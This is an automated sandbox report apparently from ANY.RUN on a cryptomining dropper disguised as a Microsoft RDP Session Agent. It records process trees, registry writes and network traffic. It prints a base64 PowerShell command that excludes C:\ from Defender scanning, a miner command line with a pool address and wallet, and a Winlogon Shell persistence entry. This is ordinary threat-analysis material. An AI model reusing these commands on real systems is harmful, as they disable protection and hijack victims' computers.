File name: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe

Full analysis: https://app.any.run/tasks/b97a9994-3802-4ebe-9074-2fbcb4e7048e
Verdict: Malicious activity
Analysis date: July 22, 2024, 15:14:56
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: upx
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5: 2CA5492F9DBCDAAB3FACF1768CAE5C6D
SHA1: 1AA94BEA1A57F4D6933258BAF9E5D6A17B332ED7
SHA256: 1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130
SSDEEP: 98304:B6GMWWCdl6k1/ZznpySti7vsEzz58ys5FNDFY7N/978+jf+T+MSvy6MCMx8WNRT7:pAoicm/B1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Changes the login/logoff helper path in the registry

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Starts a Microsoft application from unusual location

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Reads security settings of Internet Explorer

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Starts CMD.EXE for commands execution

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
    • Reads the date of Windows installation

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • BASE64 encoded PowerShell command has been detected

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Starts POWERSHELL.EXE for commands execution

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Base64-obfuscated command line is found

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Executable content was dropped or overwritten

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7032)
    • Executes application which crashes

      • Roamingsigverif.exe (PID: 1596)
  • INFO

    • Checks supported languages

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Reads the computer name

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Reads the machine GUID from the registry

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
    • Process checks computer location settings

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7032)
    • Creates files or folders in the user directory

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
      • WerFault.exe (PID: 3944)
    • UPX packer has been detected

      • RegAsm.exe (PID: 7240)
    • Checks proxy server information

      • slui.exe (PID: 1288)
    • Reads the software policy settings

      • slui.exe (PID: 1288)
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

AssemblyVersion: 10.0.17763.1
ProductVersion: 10.0.17763.1
ProductName: Microsoft® Windows® Operating System
OriginalFileName: Mfceum-4.exe
LegalTrademarks: -
LegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: Mfceum-4.exe
FileVersion: 10.0.17763.1
FileDescription: RDP Session Agent
CompanyName: Microsoft Corporation
Comments: RDP Session Agent
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 10.0.17763.1
FileVersionNumber: 10.0.17763.1
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x0000
UninitializedDataSize: -
InitializedDataSize: 69120
CodeSize: 6704128
LinkerVersion: 48
PEType: PE32+
ImageFileCharacteristics: Executable, Large address aware
TimeStamp: 2022:09:19 14:55:19+00:00
MachineType: AMD AMD64
Total processes: 151
Monitored processes: 11
Malicious processes: 2
Suspicious processes: 2

Behavior graph

Process chain in launch order ("no specs" marks nodes the report shows without details; "THREAT" is the report's label on that node):
  • start
  • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (no specs)
  • cmd.exe
  • conhost.exe (no specs)
  • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
  • powershell.exe (no specs)
  • conhost.exe (no specs)
  • regasm.exe (THREAT)
  • slui.exe
  • roamingsigverif.exe
  • conhost.exe (no specs)
  • werfault.exe (no specs)

Process information (columns: PID | CMD | Path | Indicators | Parent process)
PID: 6148
CMD: "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe"
Path: C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
RDP Session Agent
Exit code:
0
Version:
10.0.17763.1
Modules
Images
c:\users\admin\desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 6876
CMD: "C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" & EXIT
Path: C:\Windows\System32\cmd.exe
Parent process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
PID: 8180
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6976
CMD: "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe"
Path: C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
RDP Session Agent
Exit code:
0
Version:
10.0.17763.1
Modules
Images
c:\users\admin\desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 7032
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
(the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\' )
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
PID: 5464
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7240
CMD: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Parent process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 1288
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 1596
CMD: "C:\Users\admin\AppData\Roamingsigverif.exe" --algo EQUI144_5 --pers BgoldPoW --pool btg.2miners.com:4040 --user GLW2ipMiWNpeMAnrh2sW9pZ6rBo65GzY1r.Rig --log off pause
Path: C:\Users\admin\AppData\Roamingsigverif.exe
Parent process: RegAsm.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Modules
Images
c:\users\admin\appdata\roamingsigverif.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
PID: 884
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: Roamingsigverif.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 17 966
Read events: 17 914
Write events: 47
Delete events: 5

Modification events

PID: 6148 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1

PID: 6148 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: IntranetName | Value: 1

PID: 6148 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: UNCAsIntranet | Value: 1

PID: 6148 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: AutoDetect | Value: 0

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: IntranetName | Value: 1

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: UNCAsIntranet | Value: 1

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: AutoDetect | Value: 0

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation: write | Name: Shell
Value: explorer.exe,"C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe",

PID: 7240 | Process: RegAsm.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write | Name: ProxyBypass | Value: 1
Executable files: 2
Suspicious files: 3
Text files: 4
Unknown types: 0

Dropped files

PID: 3944 | Process: WerFault.exe | Type: -
Filename: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Roamingsigverif._66f25098356f7f52a4e075b57a8aebce9f615f7_ca662a69_c612c3cc-6743-4773-93f8-e23c9a29769d\Report.wer
MD5: - | SHA256: -

PID: 3944 | Process: WerFault.exe | Type: -
Filename: C:\Users\admin\AppData\Local\CrashDumps\Roamingsigverif.exe.1596.dmp
MD5: - | SHA256: -

PID: 3944 | Process: WerFault.exe | Type: xml
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0AA.tmp.xml
MD5: CBD13A519A80BD52B3AF9386DDB1F023 | SHA256: 40C11D8BBACF236568C5B012D829ED6DB275101249628037B8EF8F5D6120247B

PID: 3944 | Process: WerFault.exe | Type: binary
Filename: C:\WINDOWS\AppCompat\Programs\Amcache.hve
MD5: E365D7D9F6602071C717907929378F50 | SHA256: 2C31745D7CA5677E973A41635246C9059813AF48EB4B0A7E9A5817B9D5EC4230

PID: 3944 | Process: WerFault.exe | Type: binary
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD069.tmp.dmp
MD5: B034C4B81EA7504DCF8DD7B6BAB5B5B5 | SHA256: F4B17E156E23527EAB02FC137DA53AFFDAE3DC527A8596C6DCAA740468F4AD46

PID: 3944 | Process: WerFault.exe | Type: xml
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD099.tmp.WERInternalMetadata.xml
MD5: D3ADB0C168CFA435ED762A0A77C32A4C | SHA256: BCF64DECE86B2E1EDD067682D919C58BB63DF209D7E31CE2DA01C005E8C9CC41

PID: 7032 | Process: powershell.exe | Type: binary
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: 33F9F4F94DCD09FA4B2CBC0D548A56AA | SHA256: 099914A0200B9C1913C98776287829369DAF37B66511C915634D09F861B8B234

PID: 7240 | Process: RegAsm.exe | Type: executable
Filename: C:\Users\admin\AppData\Roamingsigverif.exe
MD5: 73278D880B15CC091A24498E5E435AD8 | SHA256: AC63628939F91B381816DCFE792B123DF57A589C0365D4BB10BFFE0F6645D026

PID: 7032 | Process: powershell.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1er4xbn.qel.ps1
MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6976 | Process: 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe | Type: executable
Filename: C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe
MD5: 2CA5492F9DBCDAAB3FACF1768CAE5C6D | SHA256: 1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130
HTTP(S) requests: 12
TCP/UDP connections: 40
DNS requests: 14
Threats: 0

HTTP requests

The report records no PID or process for any of these rows; "-" marks a column the report left empty.

Method | HTTP Code | IP | URL | Type | Size | Reputation
GET | 200 | 13.85.23.86:443 | https://slscr.update.microsoft.com/sls/ping | - | - | unknown
GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | - | - | unknown
GET | 304 | 13.85.23.86:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | - | - | unknown
GET | 200 | 20.3.187.198:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | - | - | unknown
GET | 304 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | - | - | unknown
POST | - | 20.190.160.14:443 | https://login.live.com/RST2.srf | - | - | unknown
GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | - | - | unknown
GET | 200 | 52.165.165.26:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | compressed | 23.9 Kb | unknown
POST | 401 | 4.208.221.206:443 | https://licensing.mp.microsoft.com/v7.0/licenses/content | binary | 340 b | unknown
POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | xml | 512 b | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4716 | svchost.exe | 20.190.159.23:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
5620 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4032 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
7856 | svchost.exe | 4.208.221.206:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
2760 | svchost.exe | 40.115.3.253:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1140 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4308 | SIHClient.exe | 52.165.165.26:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
5620 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown

DNS requests

Domain (reputation), followed by the resolved IPs:

login.live.com (whitelisted)
  • 20.190.159.23
  • 20.190.159.68
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.73
  • 40.126.31.71
  • 40.126.31.67
  • 20.190.159.71
settings-win.data.microsoft.com (whitelisted)
  • 51.104.136.2
  • 51.124.78.146
  • 40.127.240.158
  • 4.231.128.59
google.com (whitelisted)
  • 142.250.186.110
slscr.update.microsoft.com (whitelisted)
  • 52.165.165.26
fe3cr.delivery.mp.microsoft.com (whitelisted)
  • 20.3.187.198
licensing.mp.microsoft.com (whitelisted)
  • 4.209.33.156
activation-v2.sls.microsoft.com (whitelisted)
  • 20.83.72.98
client.wns.windows.com (whitelisted)
  • 40.113.110.67

Threats

PID | Process | Class | Message
- | - | Generic Protocol Command Decode | SURICATA HTTP Request unrecognized authorization method